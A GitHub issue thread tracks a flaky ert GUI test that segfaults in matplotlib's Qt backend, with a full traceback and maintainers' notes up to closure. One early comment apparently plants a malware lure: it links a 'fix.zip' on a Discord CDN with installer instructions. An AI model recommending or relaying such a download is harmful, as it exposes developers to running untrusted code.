### ISSUE TITLE
Flaky test failure: unit_tests/gui/test_main_window.py::test_that_gui_plotter_works_when_no_data 

### ISSUE THREAD

**Issue by berland** [equinor/ert#8616] opened 2024-09-03 06:14 UTC
```
Fatal Python error: Segmentation fault

Thread 0x00007fd0457fa700 (most recent call first):
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 306 in wait
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 558 in wait
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/ert/services/_base_service.py", line 151 in run
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 932 in _bootstrap_inner
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 890 in _bootstrap

Thread 0x00007fd071956700 (most recent call first):
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 306 in wait
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 558 in wait
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/tqdm/_monitor.py", line 60 in run
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 932 in _bootstrap_inner
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 890 in _bootstrap

Thread 0x00007fd0bb91d700 (most recent call first):
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 306 in wait
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/opentelemetry/sdk/_logs/_internal/export/__init__.py", line 249 in worker
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 870 in run
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 932 in _bootstrap_inner
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 890 in _bootstrap

Thread 0x00007fd0b711c700 (most recent call first):
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 306 in wait
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 558 in wait
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/azure/monitor/opentelemetry/exporter/_utils.py", line 195 in run
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 932 in _bootstrap_inner
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 890 in _bootstrap

Thread 0x00007fd08a7c0700 (most recent call first):
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/socket.py", line 292 in accept
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/pytest_rerunfailures.py", line 433 in run_server
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 870 in run
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 932 in _bootstrap_inner
  File "/opt/rh/rh-python38/root/usr/lib64/python3.8/threading.py", line 890 in _bootstrap

Current thread 0x00007fd0d8f15740 (most recent call first):
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/matplotlib/backends/backend_qt.py", line 694 in _icon
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/matplotlib/backends/backend_qt.py", line 654 in __init__
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/ert/gui/tools/plot/plot_widget.py", line 46 in __init__
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/ert/gui/tools/plot/plot_widget.py", line 122 in __init__
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/ert/gui/tools/plot/plot_window.py", line 300 in addPlotWidget
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/ert/gui/tools/plot/plot_window.py", line 131 in __init__
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/ert/gui/tools/plot/plot_tool.py", line 18 in trigger
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test_root/tests/unit_tests/gui/test_main_window.py", line 618 in test_that_gui_plotter_works_when_no_data
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/python.py", line 159 in pytest_pyfunc_call
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_callers.py", line 103 in _multicall
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_manager.py", line 120 in _hookexec
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_hooks.py", line 513 in __call__
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/python.py", line 1627 in runtest
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/runner.py", line 174 in pytest_runtest_call
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_callers.py", line 103 in _multicall
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_manager.py", line 120 in _hookexec
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_hooks.py", line 513 in __call__
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/runner.py", line 242 in <lambda>
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/runner.py", line 341 in from_call
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/runner.py", line 241 in call_and_report
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/runner.py", line 132 in runtestprotocol
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/runner.py", line 113 in pytest_runtest_protocol
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_callers.py", line 103 in _multicall
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_manager.py", line 120 in _hookexec
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_hooks.py", line 513 in __call__
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/main.py", line 362 in pytest_runtestloop
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_callers.py", line 103 in _multicall
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_manager.py", line 120 in _hookexec
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_hooks.py", line 513 in __call__
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/main.py", line 337 in _main
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/main.py", line 283 in wrap_session
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/main.py", line 330 in pytest_cmdline_main
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_callers.py", line 103 in _multicall
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_manager.py", line 120 in _hookexec
  File "/prog/res/komodo/bleeding-py38-rhel7/root/lib64/python3.8/site-packages/pluggy/_hooks.py", line 513 in __call__
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/config/__init__.py", line 175 in main
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/lib64/python3.8/site-packages/_pytest/config/__init__.py", line 201 in console_main
  File "/tmp/f_scout_ci/actions-runner-02/_temp/test-kenv/root/bin/pytest", line 8 in <module>
ci/testkomodo.sh: line 36: 32598 Segmentation fault      (core dumped) pytest --eclipse-simulator -v --mpl -m "not limit_memory and requires_window_manager" --benchmark-disable
unit_tests/gui/test_main_window.py::test_that_gui_plotter_works_when_no_data 
Error: Process completed with exit code 139.
```
Observed here: https://github.com/equinor/komodo-releases/actions/runs/10674527024/job/29585709004

**Comment by 777Naity** [comment] 2024-09-03 06:14
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by berland** [comment] 2024-09-06 12:26
And in https://github.com/equinor/komodo-releases/actions/runs/10736572087

**Comment by berland** [comment] 2024-10-09 10:12
Closing, not observed for a while, and could have been solved/mitigated by 31d3aa260ed19c96b40529618e56f66ea245ce4e

**Comment by eivindjahren** [comment] 2024-10-14 05:03
Another failure here: https://github.com/equinor/komodo-releases/actions/runs/11293827505/job/31413299650

**Comment by eivindjahren** [comment] 2024-10-14 05:06
As of yet this issue is blocked by not being able to reproduce it.

**Comment by eivindjahren** [comment] 2024-12-20 13:37
All tests in `tests/ert/ui_tests/gui/test_main_window.py` have for the last 30 days failed twice, and none for the last 7 days. There is nothing special about this one test and since there has been no failures for 7 days I am closing the issue now.

**Closed by eivindjahren** 2024-12-20 13:37 UTC
Labels: flaky-test, christmas-review
